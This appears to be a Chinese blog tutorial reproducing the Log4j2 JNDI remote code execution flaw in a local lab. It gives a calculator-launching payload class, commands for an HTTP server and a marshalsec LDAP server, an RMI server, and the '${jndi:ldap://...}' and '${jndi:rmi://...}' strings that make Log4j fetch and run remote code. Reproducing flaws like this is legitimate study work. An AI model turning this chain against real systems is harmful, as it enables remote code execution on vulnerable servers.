Log4j2高危漏洞复现流程

背景

 Apache Log4j2是一个基于Java的日志记录工具,该工具重写了Log4j框架,并且引入了大量丰富的特性,Apache log4j-2是Log4j的升级版,这个日志框架被大量用于业务系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中,而攻击者则可以利用此特性通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。
 本文章主要是处于个人兴趣想去复现一下 Log4j2的漏洞,事先声明本人对安全领域一窍不通,只是之前碰巧读过部分 Log4j 的代码,所以有兴趣研究下这个问题的根源,当然这篇文章只是告诉大家怎么去复现这个问题。关于 Log4j2部分的源码得等下篇文章了。


环境介绍

  • 操作系统:macOS Catalina
  • java version "1.8.0_191"
  • LDAP服务端
  • python3.x
  • 手写 RMI 服务端以及测试代码。


LDAP 方式复现

  • 1.手写hack 代码用于启动mac 系统的计算器 java 代码,编译成class 文件。
  • 2.在 class 目录通过 python3 -m http.server 启动服务后能够通过 http 协议访到 hack 的 class 文件。
  • 3.通过marshalsec启动一个 LDAP 服务器,代码开源可以手动各种操作,编译成 jar 包参考LDAP服务端
  • 4.通过 log4j2的打印日志然后访问 hack 代码启动本地计算器。
public class BugFinder {

    public BugFinder() {
        try {
            System.out.println("执行漏洞代码");
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
            System.out.println("完成执行漏洞代码");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        BugFinder bugFinder = new BugFinder();
    }
}
  • hack 的代码负责启动mac系统的计算器。


python3 -m http.server 8000

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#BugFinder"
  • 在 hack 的class文件所在目录通 python3启动http服务暴露 hack 的 class 文件。
  • 通过marshalsec的开源软件启动 LDAP 服务,参考LDAP服务端


package com.bug;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class BugTester {

    private static final Logger logger = LogManager.getLogger(BugTester.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://192.168.0.3:1389/BugFinder}");
        try {
            Thread.sleep(1000);
        } catch (Exception e) {

        }
    }
}
  • 通过 log4j2的打印日志${jndi:ldap://192.168.0.3:1389/BugFinder}唤起本地计算器。
  • 不同的 JDK 对于com.sun.jndi.ldap.object.trustURLCodebase的默认值不一样,所以为了测试统一设置成true 便于触发。
  • 不同的 JDK 版本的默认值可能导致这个 bug 不会被触发。


RMI 方式复现

  • 1.手写hack 代码用于启动mac 系统的计算器 java 代码,编译成class 文件。
  • 2.手写 RMI 的服务端代码。
  • 3.通过 log4j2的打印日志然后访问 hack 代码启动本地计算器。
package com.bug;

public class BugFinder {

    public BugFinder() {
        try {
            System.out.println("执行漏洞代码");
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
            System.out.println("完成执行漏洞代码");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        BugFinder bugFinder = new BugFinder();
    }
}
  • hack 的代码负责启动mac系统的计算器。


package com.bug;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {

    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            Reference reference = new Reference("com.bug.BugFinder",
                    "com.bug.BugFinder", null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);

            registry.bind("BugFinder", referenceWrapper);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
  • RMI 的服务端代码,启动1099端口进行监听。对应 log4j2的日志通过"jndi:rmi://192.168.0.3:1099/BugFinder"进行访问呢。
  • Reference的参数com.bug.BugFinder就是 hack 代码的class 路径。


public class BugTester {

    private static final Logger logger = LogManager.getLogger(BugTester.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:rmi://192.168.0.3:1099/BugFinder}");

        try {
            Thread.sleep(1000);
        } catch (Exception e) {
        }
    }
}
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 201,468评论 5 473
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,620评论 2 377
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 148,427评论 0 334
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,160评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,197评论 5 363
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,334评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,775评论 3 393
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,444评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,628评论 1 295
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,459评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,508评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,210评论 3 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,767评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,850评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,076评论 1 258
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,627评论 2 348
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,196评论 2 341

推荐阅读更多精彩内容